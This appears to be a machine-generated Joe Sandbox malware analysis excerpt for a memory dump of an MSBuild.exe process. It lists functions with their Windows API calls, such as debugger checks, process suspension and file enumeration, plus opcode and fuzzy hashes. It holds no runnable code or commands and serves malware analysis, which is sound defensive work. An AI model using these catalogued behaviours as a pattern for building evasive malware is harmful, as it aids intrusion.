                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4212172061-0
                                                                                                                                                                                    • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                    • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 301083792-0
                                                                                                                                                                                    • Opcode ID: 586b27ffd1be0f57c4ef0223362333014e1a2349df6d06ba62fef6ff1824d49d
                                                                                                                                                                                    • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 586b27ffd1be0f57c4ef0223362333014e1a2349df6d06ba62fef6ff1824d49d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 00448067
                                                                                                                                                                                      • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                                      • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 806657224-0
                                                                                                                                                                                    • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                    • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2829624132-0
                                                                                                                                                                                    • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                    • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                    • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                    • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                    • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                    • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                    • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                    • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                    • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                    • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                                                                                                                    • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1999457699-0
                                                                                                                                                                                    • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                    • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                                                                                                                    • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3614150671-0
                                                                                                                                                                                    • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                    • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                                                                                                    • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                    • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                                                                    • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                    • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                                                                    • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                    • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                                                                    • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                    • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                                                                                    • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (khv
                                                                                                                                                                                    • API String ID: 0-335694250
                                                                                                                                                                                    • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                                                                                    • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (khv
                                                                                                                                                                                    • API String ID: 0-335694250
                                                                                                                                                                                    • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                                                                                    • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1663032902-0
